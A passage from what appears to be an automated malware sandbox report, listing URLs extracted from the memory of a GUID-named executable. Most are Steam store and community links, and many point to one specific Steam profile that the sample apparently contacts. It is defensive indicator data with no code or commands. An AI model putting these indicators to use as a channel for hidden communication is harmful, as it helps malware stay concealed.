Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.c
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/O
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158701054.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/o
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619#
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619?
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619E
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619G
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619_
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619i
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619stea%
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619tlq
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;a(
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/leg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 